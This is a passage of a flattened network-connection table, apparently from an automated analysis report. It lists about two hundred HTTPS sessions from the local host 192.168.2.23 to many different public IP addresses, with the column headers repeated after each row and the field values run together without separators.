                                            26994192.168.2.2338788183.216.57.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26995192.168.2.2347214138.238.185.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26996192.168.2.2343302183.234.32.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26997192.168.2.2345474211.237.242.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26998192.168.2.2342906100.230.44.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26999192.168.2.235717619.62.219.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27000192.168.2.234133623.84.49.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27001192.168.2.235604660.118.244.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27002192.168.2.2346642174.65.239.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27003192.168.2.2345228105.197.62.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27004192.168.2.234038674.92.119.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27005192.168.2.2339918161.251.126.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27006192.168.2.2342528118.68.153.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27007192.168.2.2356564100.14.9.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27008192.168.2.2346574122.29.56.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27009192.168.2.2356314208.130.128.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27010192.168.2.2339794217.212.38.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27011192.168.2.2353284173.176.30.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27012192.168.2.234629831.105.120.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27013192.168.2.2359544124.90.147.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27014192.168.2.2344650211.96.56.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27015192.168.2.234081260.87.92.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27016192.168.2.2355256128.178.209.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27017192.168.2.2338276149.164.9.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27018192.168.2.235348266.237.216.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27019192.168.2.2352044202.134.175.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27020192.168.2.233826617.197.254.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27021192.168.2.234687675.194.150.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27022192.168.2.2351412113.211.58.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27023192.168.2.2351136202.98.55.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27024192.168.2.2345924168.79.17.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27025192.168.2.235319251.88.196.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27026192.168.2.233633462.128.22.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27027192.168.2.2358618202.108.84.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27028192.168.2.2335696210.52.56.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27029192.168.2.234394666.89.66.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27030192.168.2.2360262106.48.171.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27031192.168.2.2347048129.101.45.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27032192.168.2.235807068.30.32.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27033192.168.2.235676670.211.132.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27034192.168.2.2359672198.170.143.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27035192.168.2.2352550119.27.124.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27036192.168.2.234505485.244.104.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27037192.168.2.233847038.225.228.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27038192.168.2.234075417.179.168.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27039192.168.2.2340344159.234.35.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27040192.168.2.233770468.178.64.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27041192.168.2.2358580206.201.8.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27042192.168.2.233821098.201.166.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27043192.168.2.2354056112.244.65.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27044192.168.2.2357536148.239.167.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27045192.168.2.2356972108.190.31.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27046192.168.2.2358110151.251.186.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27047192.168.2.2348546216.213.82.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27048192.168.2.2352806156.178.28.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27049192.168.2.2347008114.17.239.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27050192.168.2.234911699.80.151.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27051192.168.2.2356884159.113.38.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27052192.168.2.2353928213.220.30.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27053192.168.2.2338156199.229.92.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27054192.168.2.2340800154.139.16.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27055192.168.2.234217872.235.96.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27056192.168.2.236037476.87.155.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27057192.168.2.235106252.172.40.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27058192.168.2.234403879.57.17.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27059192.168.2.2337350170.190.139.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27060192.168.2.2351240194.248.204.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27061192.168.2.2352542177.52.125.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27062192.168.2.235156464.255.220.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27063192.168.2.233336054.62.195.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27064192.168.2.2342710116.141.160.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27065192.168.2.2355586133.121.236.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27066192.168.2.2334092178.164.117.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27067192.168.2.2343806104.153.20.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27068192.168.2.2337670220.58.105.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27069192.168.2.2341836165.223.130.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27070192.168.2.2340254206.195.64.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27071192.168.2.235079645.145.128.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27072192.168.2.2338624204.195.155.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27073192.168.2.2353940154.186.104.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27074192.168.2.235355680.142.7.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27075192.168.2.2352664131.142.38.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27076192.168.2.2356384185.151.181.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27077192.168.2.23417884.22.147.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27078192.168.2.2340222133.50.119.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27079192.168.2.2344148171.65.212.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27080192.168.2.234144857.208.78.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27081192.168.2.2349908202.89.110.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27082192.168.2.233910823.3.247.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27083192.168.2.234796474.119.145.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27084192.168.2.2350946121.210.127.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27085192.168.2.235195018.202.120.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27086192.168.2.234003013.57.236.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27087192.168.2.233914272.194.220.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27088192.168.2.2338550169.190.99.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27089192.168.2.235928860.73.192.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27090192.168.2.234726466.229.205.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27091192.168.2.2347492120.251.246.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27092192.168.2.2336370115.92.175.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27093192.168.2.2344504131.13.73.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27094192.168.2.2346222195.177.140.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27095192.168.2.2346024109.233.26.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27096192.168.2.234416895.7.144.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27097192.168.2.2347982150.72.227.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27098192.168.2.2356944196.172.254.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27099192.168.2.2336868192.184.172.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27100192.168.2.2342236143.58.76.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27101192.168.2.2340160113.190.60.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27102192.168.2.234733673.115.62.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27103192.168.2.2356824216.94.54.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27104192.168.2.2341826202.20.206.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27105192.168.2.235811472.250.152.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27106192.168.2.2360828108.91.119.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27107192.168.2.2355372163.14.250.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27108192.168.2.2338332123.232.133.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27109192.168.2.233994099.145.19.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27110192.168.2.2347984216.64.199.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27111192.168.2.236017477.253.18.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27112192.168.2.233792678.220.46.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27113192.168.2.234656852.182.69.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27114192.168.2.2348680172.243.97.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27115192.168.2.2343962174.202.221.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27116192.168.2.235052253.44.224.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27117192.168.2.2345908105.54.115.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27118192.168.2.235630478.133.128.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27119192.168.2.2334060141.234.158.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27120192.168.2.2350914101.12.215.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27121192.168.2.23524565.88.144.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27122192.168.2.2338750218.91.125.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27123192.168.2.2359454188.81.32.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27124192.168.2.2357824149.167.23.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27125192.168.2.2337928181.10.25.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27126192.168.2.2358268162.187.27.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27127192.168.2.233289877.216.227.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27128192.168.2.2353444128.60.193.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27129192.168.2.2335702197.244.147.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27130192.168.2.2342508101.41.33.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27131192.168.2.2350020116.35.99.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27132192.168.2.2350092205.5.67.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27133192.168.2.2340920130.186.196.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27134192.168.2.2340126175.67.66.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27135192.168.2.2358974102.122.152.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27136192.168.2.236033248.139.56.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27137192.168.2.2357872217.206.173.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27138192.168.2.23511384.135.253.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27139192.168.2.2333884116.105.245.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27140192.168.2.2357348172.53.130.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27141192.168.2.233971273.63.249.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27142192.168.2.2350186131.113.1.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27143192.168.2.234310457.115.148.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27144192.168.2.233821286.62.55.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27145192.168.2.234298460.47.196.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27146192.168.2.2348030112.236.80.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27147192.168.2.234602042.206.173.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27148192.168.2.234074865.133.162.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27149192.168.2.2335324147.91.6.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27150192.168.2.2359198139.158.23.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27151192.168.2.2339762147.25.88.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27152192.168.2.233549823.253.49.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27153192.168.2.2342228125.75.72.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27154192.168.2.234118439.195.215.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27155192.168.2.2358682158.60.105.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27156192.168.2.2360046192.87.109.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27157192.168.2.234593845.118.88.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27158192.168.2.2344154207.209.193.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27159192.168.2.235445685.142.228.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27160192.168.2.2356414157.52.57.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27161192.168.2.233680271.70.114.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27162192.168.2.2359608180.138.133.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27163192.168.2.2352230189.171.170.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27164192.168.2.235764050.69.164.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27165192.168.2.235187867.121.114.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27166192.168.2.2344312101.23.246.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27167192.168.2.2356948172.86.131.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27168192.168.2.234928418.200.213.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27169192.168.2.2344488222.251.15.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27170192.168.2.233411646.106.105.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27171192.168.2.2343614168.15.216.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27172192.168.2.2337210207.240.161.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27173192.168.2.234179824.150.99.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27174192.168.2.2343204145.9.132.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27175192.168.2.2333058190.243.221.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27176192.168.2.234681244.156.3.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27177192.168.2.233389688.98.154.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27178192.168.2.234626831.18.216.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27179192.168.2.2353868177.240.23.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27180192.168.2.2351938205.88.117.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27181192.168.2.2337542115.17.223.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27182192.168.2.235834476.42.12.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27183192.168.2.2346656171.131.115.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27184192.168.2.2359018126.147.78.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27185192.168.2.2347968153.50.145.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27186192.168.2.233633046.94.201.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27187192.168.2.2344338181.181.13.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27188192.168.2.2360258206.7.96.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27189192.168.2.2352354222.206.193.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27190192.168.2.2333080145.68.205.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27191192.168.2.2339486185.233.57.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27192192.168.2.234139890.19.240.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27193192.168.2.2355916219.142.70.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27194192.168.2.2338184192.90.47.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27195192.168.2.2335152143.200.136.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27196192.168.2.234616843.161.104.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27197192.168.2.2360064219.199.67.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27198192.168.2.233703886.213.214.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27199192.168.2.235631839.122.105.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27200192.168.2.2341746184.33.185.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27201192.168.2.234762477.110.131.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27202192.168.2.234061490.92.21.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27203192.168.2.233422040.87.95.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27204192.168.2.23333948.87.104.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27205192.168.2.2350406144.56.201.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27206192.168.2.233523895.158.225.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27207192.168.2.2339090125.19.37.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27208192.168.2.2345414208.227.164.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27209192.168.2.2350460162.82.5.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27210192.168.2.2355908148.226.178.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27211192.168.2.2339278206.37.244.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27212192.168.2.2334946133.129.141.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27213192.168.2.235314868.206.193.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27214192.168.2.2357846196.245.183.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27215192.168.2.235634620.207.155.123443
                                            TimestampBytes transferredDirectionData


